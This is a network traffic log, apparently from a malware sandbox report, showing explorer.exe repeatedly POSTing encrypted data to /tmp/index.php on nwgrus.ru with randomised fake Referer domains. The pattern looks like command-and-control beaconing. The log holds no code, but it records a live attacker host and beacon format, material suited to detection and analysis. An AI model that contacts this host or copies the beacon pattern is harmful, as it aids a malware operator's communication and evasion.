                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.549714116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:33.477191925 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jlkucuylyof.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 278
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:33.477210045 CEST278OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 62 4b cc a2
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vubKGbUy5ayibsBZP#*x!K|(L|{<?c 5AB>XbvZv*BFdPKC!
                                                                      Sep 25, 2024 16:01:34.746088982 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.549715116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:34.754909039 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ejvnhlvhpussik.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 368
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:34.754909039 CEST368OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5f 58 d5 af
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu_XDVa~{kwPN94aBVfCT9'R)UvC32{!OOm9_-$}-|1a>;dykQZb\(">X
                                                                      Sep 25, 2024 16:01:36.015013933 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:35 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.549716116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:36.023788929 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vsagqcxnudryn.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 196
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:36.023788929 CEST196OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2c 4b c2 e4
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu,K-f`koY0 B<zjf9OHqXH&S|C?1#25jCMaE%_
                                                                      Sep 25, 2024 16:01:37.606019020 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:37 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.549717116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:37.620239973 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://fogsqjysaystoh.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 359
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:37.620268106 CEST359OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 33 28 e8 b7
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu3(W^xuds3eLZ85KmdW7rV218UTv{49saDc#ZW "iMo FPqC(|sXz
                                                                      Sep 25, 2024 16:01:39.026094913 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.549718116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:39.034404993 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://verasvafreecifd.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 220
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:39.034416914 CEST220OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 22 20 b7 e9
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu" vAD^NXaua~-d@Z24f@T__K\2'VE7 )tw,[18.w
                                                                      Sep 25, 2024 16:01:40.325072050 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:40 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.549719116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:40.333619118 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://eaxyrbajkqo.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 304
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:40.333642960 CEST304OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 3a 1f f8 82
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu:GIBYyNkpL:Lrpt,5\?JGQHITS3]`?5?GsaC9U,2%uoo=?jT#:%2
                                                                      Sep 25, 2024 16:01:41.599371910 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:41 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.549720116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:41.608059883 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://dfqwnqnvxbwcwpps.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 272
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:41.608084917 CEST272OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 00 c8 fb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuw6yo?2\G*xrwEm~'QW'@)3@\[,@X1T~x2fVBI<gcTT>J:2A7$
                                                                      Sep 25, 2024 16:01:42.873982906 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:42 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.549721116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:42.888470888 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ovvofxjtrlcblbe.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 174
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:42.888525009 CEST174OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 33 35 cf fd
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu35z^S>Rf5OA9u\^u7]_c>GqD,=c'6Fjz
                                                                      Sep 25, 2024 16:01:44.128271103 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:43 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.549722116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:44.136698008 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://khaxmqmrelincl.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 201
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:44.136732101 CEST201OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 20 32 de eb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu 2N,dLRguz(y6h1>BD5K0.&JD{CU#Nm:z`B4Q
                                                                      Sep 25, 2024 16:01:45.386388063 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:45 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.549723116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:45.519504070 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://tuivtdfccoxjstqv.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 184
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:45.519610882 CEST184OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4f 4a fe f0
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuOJN5`cdA2[H<xKj@gA/8UmI>1Sj]8$.a&,
                                                                      Sep 25, 2024 16:01:46.758783102 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:46 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.549724116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:46.769692898 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ktflshoikbglbj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 136
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:46.769721985 CEST136OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 30 07 ca 97
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu0[Okbvv&$Y_vkv4y
                                                                      Sep 25, 2024 16:01:48.049710035 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:47 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
